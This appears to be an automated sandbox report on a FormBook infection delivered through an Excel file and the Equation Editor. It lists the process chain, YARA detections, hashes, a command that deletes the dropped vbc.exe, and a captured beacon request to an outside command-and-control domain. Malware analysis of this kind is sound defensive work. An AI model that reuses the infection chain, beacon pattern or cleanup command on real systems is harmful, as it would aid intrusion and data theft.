6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 341<html><head><script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?dc4ddbf2b3feefda55750af44055021b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49172	163.44.239.73	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:52:11.978595972 CEST	1418	OUT	GET /p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.adultpeace.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 16:52:12.266453981 CEST	1419	IN	HTTP/1.1 301 Moved Permanently Connection: close Content-Type: text/html Content-Length: 706 Date: Tue, 03 Aug 2021 14:52:12 GMT Server: LiteSpeed Location: https://www.adultpeace.com/p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2768 Parent PID: 584

General

Start time:	16:49:43
Start date:	03/08/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fa90000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2444 Parent PID: 584

General

Start time:	16:50:05
Start date:	03/08/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 3020 Parent PID: 2444

General

Start time:	16:50:08
Start date:	03/08/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x1370000
File size:	1336832 bytes
MD5 hash:	214B1DDF045E4D6FDD73A5C8788D2ADC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2224 Parent PID: 3020

General

Start time:	16:50:11
Start date:	03/08/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x1370000
File size:	1336832 bytes
MD5 hash:	214B1DDF045E4D6FDD73A5C8788D2ADC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 2224

General

Start time:	16:50:14
Start date:	03/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: netsh.exe PID: 1428 Parent PID: 1388

General

Start time:	16:50:29
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\netsh.exe
Imagebase:	0xc00000
File size:	96256 bytes
MD5 hash:	784A50A6A09C25F011C3143DDD68E729
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 1144 Parent PID: 1428

General

Start time:	16:50:33
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4a5f0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 3020 Parent PID: 2444 vbc.exeCOMMON

Executed Functions

Function 04EF0048, Relevance: 116.3, Strings: 77, Instructions: 20001COMMON

Download Yara Rule

Strings

TNAl, xrefs: 04EF32A2
TNAl, xrefs: 04EFB20E
TNAl, xrefs: 04EF6BB3
TNAl, xrefs: 04EF8465
TNAl, xrefs: 04EF8281
TNAl, xrefs: 04EF7CD2
TNAl, xrefs: 04EF8649
TNAl, xrefs: 04F00146
TNAl, xrefs: 04EFB3F5
TNAl, xrefs: 04EFFB91
TNAl, xrefs: 04F008DC
TNAl, xrefs: 04EFC32A
TNAl, xrefs: 04EF65FE
TNAl, xrefs: 04EF5BB7
TNAl, xrefs: 04EF4FEC
TNAl, xrefs: 04EF7168
TNAl, xrefs: 04EFBF5F
TNAl, xrefs: 04EFF9AA
TNAl, xrefs: 04EFA2D6
TNAl, xrefs: 04EF809D
TNAl, xrefs: 04EFE6A4
TNAl, xrefs: 04EF67E5
TNAl, xrefs: 04EFB027
TNAl, xrefs: 04EF550E
TNAl, xrefs: 04F030F1
TNAl, xrefs: 04F006F8
TNAl, xrefs: 04EFB5DC
TNAl, xrefs: 04EF734F
TNAl, xrefs: 04EF6230
TNAl, xrefs: 04EFA6A4
TNAl, xrefs: 04F00AC0
TNAl, xrefs: 04EFC146
TNAl, xrefs: 04EFC6F2
TNAl, xrefs: 04EF7AEB
TNAl, xrefs: 04EF69CC
TNAl, xrefs: 04EFF3F5
TNAl, xrefs: 04F02DBB
TNAl, xrefs: 04F00CA4
TNAl, xrefs: 04EFF20E
TNAl, xrefs: 04EF51A2
TNAl, xrefs: 04EFF027
TNAl, xrefs: 04EF587A
TNAl, xrefs: 04EF7EB9
TNAl, xrefs: 04EFA88B
TNAl, xrefs: 04EF771D
TNAl, xrefs: 04EFBD78
TNAl, xrefs: 04EFC50E
TNAl, xrefs: 04EF6D9A
TNAl, xrefs: 04EFEA72
TNAl, xrefs: 04EF5EF3
TNAl, xrefs: 04EFC8D6
TNAl, xrefs: 04EFB7C3
TNAl, xrefs: 04EFEE40
TNAl, xrefs: 04EFE88B
TNAl, xrefs: 04EF56C4
TNAl, xrefs: 04EFF5DC
TNAl, xrefs: 04EF6F81
TNAl, xrefs: 04EFFF5F
TNAl, xrefs: 04EF4CE4
TNAl, xrefs: 04F00514
TNAl, xrefs: 04EFA4BD
TNAl, xrefs: 04EFAC59
TNAl, xrefs: 04EF345A
TNAl, xrefs: 04EFFD78
TNAl, xrefs: 04EFAA72
TNAl, xrefs: 04EF6417
TNAl, xrefs: 04EFB9AA
TNAl, xrefs: 04EF7536
TNAl, xrefs: 04EF7904
TNAl, xrefs: 04F02A84
TNAl, xrefs: 04EFBB91
TNAl, xrefs: 04EF5358
TNAl, xrefs: 04EFEC59
TNAl, xrefs: 04F03428
TNAl, xrefs: 04EFAE40
TNAl, xrefs: 04EFF7C3
TNAl, xrefs: 04F0032D

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID: TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl
API String ID: 0-1937664907
Opcode ID: 9ffd46b3f55f62e0661d5d4ce00c9e8eafdd5b99ee494d2f4338a14e723dddda
Instruction ID: c2a5e6bc50ab3ed0d3b201ca75c4bcc5386ff12bbdff0fc83956d1b07169a149
Opcode Fuzzy Hash: 9ffd46b3f55f62e0661d5d4ce00c9e8eafdd5b99ee494d2f4338a14e723dddda
Instruction Fuzzy Hash: ECB4C538A50618CFC724EF24C998AD9B7B1FF8A304F1145E9E509AB761DB71AE81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 04EF0006, Relevance: 116.3, Strings: 77, Instructions: 20001COMMON

Download Yara Rule

Strings

TNAl, xrefs: 04EF32A2
TNAl, xrefs: 04EFB20E
TNAl, xrefs: 04EF6BB3
TNAl, xrefs: 04EF8465
TNAl, xrefs: 04EF8281
TNAl, xrefs: 04EF7CD2
TNAl, xrefs: 04EF8649
TNAl, xrefs: 04F00146
TNAl, xrefs: 04EFB3F5
TNAl, xrefs: 04EFFB91
TNAl, xrefs: 04F008DC
TNAl, xrefs: 04EFC32A
TNAl, xrefs: 04EF65FE
TNAl, xrefs: 04EF5BB7
TNAl, xrefs: 04EF4FEC
TNAl, xrefs: 04EF7168
TNAl, xrefs: 04EFBF5F
TNAl, xrefs: 04EFF9AA
TNAl, xrefs: 04EFA2D6
TNAl, xrefs: 04EF809D
TNAl, xrefs: 04EFE6A4
TNAl, xrefs: 04EF67E5
TNAl, xrefs: 04EFB027
TNAl, xrefs: 04EF550E
TNAl, xrefs: 04F030F1
TNAl, xrefs: 04F006F8
TNAl, xrefs: 04EFB5DC
TNAl, xrefs: 04EF734F
TNAl, xrefs: 04EF6230
TNAl, xrefs: 04EFA6A4
TNAl, xrefs: 04F00AC0
TNAl, xrefs: 04EFC146
TNAl, xrefs: 04EFC6F2
TNAl, xrefs: 04EF7AEB
TNAl, xrefs: 04EF69CC
TNAl, xrefs: 04EFF3F5
TNAl, xrefs: 04F02DBB
TNAl, xrefs: 04F00CA4
TNAl, xrefs: 04EFF20E
TNAl, xrefs: 04EF51A2
TNAl, xrefs: 04EFF027
TNAl, xrefs: 04EF587A
TNAl, xrefs: 04EF7EB9
TNAl, xrefs: 04EFA88B
TNAl, xrefs: 04EF771D
TNAl, xrefs: 04EFBD78
TNAl, xrefs: 04EFC50E
TNAl, xrefs: 04EF6D9A
TNAl, xrefs: 04EFEA72
TNAl, xrefs: 04EF5EF3
TNAl, xrefs: 04EFC8D6
TNAl, xrefs: 04EFB7C3
TNAl, xrefs: 04EFEE40
TNAl, xrefs: 04EFE88B
TNAl, xrefs: 04EF56C4
TNAl, xrefs: 04EFF5DC
TNAl, xrefs: 04EF6F81
TNAl, xrefs: 04EFFF5F
TNAl, xrefs: 04EF4CE4
TNAl, xrefs: 04F00514
TNAl, xrefs: 04EFA4BD
TNAl, xrefs: 04EFAC59
TNAl, xrefs: 04EF345A
TNAl, xrefs: 04EFFD78
TNAl, xrefs: 04EFAA72
TNAl, xrefs: 04EF6417
TNAl, xrefs: 04EFB9AA
TNAl, xrefs: 04EF7536
TNAl, xrefs: 04EF7904
TNAl, xrefs: 04F02A84
TNAl, xrefs: 04EFBB91
TNAl, xrefs: 04EF5358
TNAl, xrefs: 04EFEC59
TNAl, xrefs: 04F03428
TNAl, xrefs: 04EFAE40
TNAl, xrefs: 04EFF7C3
TNAl, xrefs: 04F0032D

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID: TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl$TNAl
API String ID: 0-1937664907
Opcode ID: c7e57e7c687b2611be9a744d5d7592c0272e0426c27914e65725bcfe25cf9842
Instruction ID: 342ab8da44f62cd2dc5e21881fd15578ed0a061997f7dae085ffdb8c41ef1adc
Opcode Fuzzy Hash: c7e57e7c687b2611be9a744d5d7592c0272e0426c27914e65725bcfe25cf9842
Instruction Fuzzy Hash: 9FB4C538A50618CFC724EF24C998AD9B7B1FF8A304F1145E9E509AB761DB71AE81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 04F0D1F6, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b846fe156597f906613349b7ba9481392c8e9780c0dd74f85f81d50d64b8ac8a
Instruction ID: 8cabbc05b75e59c6070dc29ce1419e0059dbe3be485cf74848909ae3576cecd2
Opcode Fuzzy Hash: b846fe156597f906613349b7ba9481392c8e9780c0dd74f85f81d50d64b8ac8a
Instruction Fuzzy Hash: BF91D274E052088FDB08CFE9C98469EFBB2EF89304F14942AD915BB368D734A946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04F0D210, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b56636488c1a4c84020a3daa4c022422374a3e3b165fd879e32fa8b81991568
Instruction ID: 9290f24f195721d14ee30415656a7320d6ae7fe4cc19512872065d239068f6a3
Opcode Fuzzy Hash: 5b56636488c1a4c84020a3daa4c022422374a3e3b165fd879e32fa8b81991568
Instruction Fuzzy Hash: D791D274E002198FDB08CFE9C984A9EFBB2EF88304F10942AD915BB358D734A9468F54

Uniqueness

Uniqueness Score: -1.00%

Function 004082E2, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f950c88afe1e80c9a35f47b84ea13f4eaa06f5861cf196f462db3934ec0183b
Instruction ID: 8e8eb81402e18703e6f491e89081d25d8a9a379fa329dd1256a83aa1220b2ad4
Opcode Fuzzy Hash: 5f950c88afe1e80c9a35f47b84ea13f4eaa06f5861cf196f462db3934ec0183b
Instruction Fuzzy Hash: A2714971E04619CBDB28CF66CD40BDAB7B6BFC9300F14C5BAD509B6255EB345A868F04

Uniqueness

Uniqueness Score: -1.00%

Function 04F0E420, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e8baec90c85d33fc66439bd23a7fa08ea4ff957e54fe2f090ef326e73c26ef
Instruction ID: 87e3854cecca8f4adf88b80edff98f843f7429e28d7a8dea6c2dfec4561be62a
Opcode Fuzzy Hash: 30e8baec90c85d33fc66439bd23a7fa08ea4ff957e54fe2f090ef326e73c26ef
Instruction Fuzzy Hash: ED610875E002198BDB14CFA6D8805DEFBB2FFC9310F24C566E509BB254D730AA869F51

Uniqueness

Uniqueness Score: -1.00%

Function 04F0DD58, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c83699cb9cd6b0c30d5ded556965bcc23b9a1b079a340c7d1a4b498fc3d03a3
Instruction ID: 20c11a25bca0f450f5bb769575a8e94386bdf97dd6857632b7ca9da48ab8c4af
Opcode Fuzzy Hash: 7c83699cb9cd6b0c30d5ded556965bcc23b9a1b079a340c7d1a4b498fc3d03a3
Instruction Fuzzy Hash: BD5138B4E05209DFCB44CFA9D9809AEFBF2EF89300F14C5AAD415A7354E334AA429F50

Uniqueness

Uniqueness Score: -1.00%

Function 04F0DA72, Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63ff684de389a9578da0530ab6ad1f8ec71558249f2953b48252c3619abcad56
Instruction ID: d43cc02adb3f0ab0b27d54dd664baced54bba61f7363502839212c4ee97424a7
Opcode Fuzzy Hash: 63ff684de389a9578da0530ab6ad1f8ec71558249f2953b48252c3619abcad56
Instruction Fuzzy Hash: 9951F9B0E042198FCB08CFE9D9506AEFBF2AFC8301F14D46AD419B7251E7349942DB65

Uniqueness

Uniqueness Score: -1.00%

Function 04F0C641, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e39d19fdba1117394e5a242462e783cb5ad8c3191975a97a45e392d393cafac
Instruction ID: 6b38bcc4de00f6cfa5268e5fdb95d8ef2b1df1670498905dde7c615c623c5e31
Opcode Fuzzy Hash: 3e39d19fdba1117394e5a242462e783cb5ad8c3191975a97a45e392d393cafac
Instruction Fuzzy Hash: AD31B371E01618CBEB18CFAAD94179EFBF3AFC8300F14C5AAD518A7264EB345A458F51

Uniqueness

Uniqueness Score: -1.00%

Function 04F086F0, Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

`!>m, xrefs: 04F08820
`!>m, xrefs: 04F08830
`!>m, xrefs: 04F0872C

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID: `!>m$`!>m$`!>m
API String ID: 0-1925680254
Opcode ID: 3c525d7c2792c905708bd81304233b7d08dd4ff3551d14743f3a0917564adda6
Instruction ID: 02767c324c849d610627bbfb23c2debcd341d3c7a6f2425fc595b60e69166fb0
Opcode Fuzzy Hash: 3c525d7c2792c905708bd81304233b7d08dd4ff3551d14743f3a0917564adda6
Instruction Fuzzy Hash: 9851E074E00218DFDB14DFE9D940ADEBBF2BF88344F148029E905AB3A4DB74A942DB51

Uniqueness

Uniqueness Score: -1.00%

Function 04F09B9A, Relevance: 2.7, Strings: 2, Instructions: 166COMMON

Download Yara Rule

Strings

PSAl, xrefs: 04F09C4C
PSAl, xrefs: 04F09C5C

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID: PSAl$PSAl
API String ID: 0-3999815081
Opcode ID: 04984fcc5b34b13232f58bc4fe10b8140f73271abc17661ed44b935d18046253
Instruction ID: 7865a8d706fb045578e564e14d9f08ad6727753f7f7fbaf9b9cca7f703a5eef4
Opcode Fuzzy Hash: 04984fcc5b34b13232f58bc4fe10b8140f73271abc17661ed44b935d18046253
Instruction Fuzzy Hash: 7D71A1B4E05219CFCB50DFA4D984AADBBF1BF49310F208469D50AEB396EB70A941DF10

Uniqueness

Uniqueness Score: -1.00%

Function 04F086E0, Relevance: 2.6, Strings: 2, Instructions: 114COMMON

Download Yara Rule

Strings

`!>m, xrefs: 04F08820
`!>m, xrefs: 04F0872C

Memory Dump Source

Source File: 00000006.00000002.2166025777.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: false

Similarity

API ID:
String ID: `!>m$`!>m
API String ID: 0-2276352449
Opcode ID: 473362681d2d67e3b493ac5cdce5ea6a0e3e03160dfbcc3f55b7d9f8aba66813
Instruction ID: 77662fe4f6786c14945b157dcac65c9579ed1c370e82f1866203ea7505a34af2
Opcode Fuzzy Hash: 473362681d2d67e3b493ac5cdce5ea6a0e3e03160dfbcc3f55b7d9f8aba66813
Instruction Fuzzy Hash: 12411374E00258DFDB14DFE9D940ADEBBF2BF88340F14806AE504AB3A5D7346942DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00406AEA, Relevance: 1.8, APIs: 1, Instructions: 324processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00406DB7

Memory Dump Source

Source File: 00000006.00000002.2154425548.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
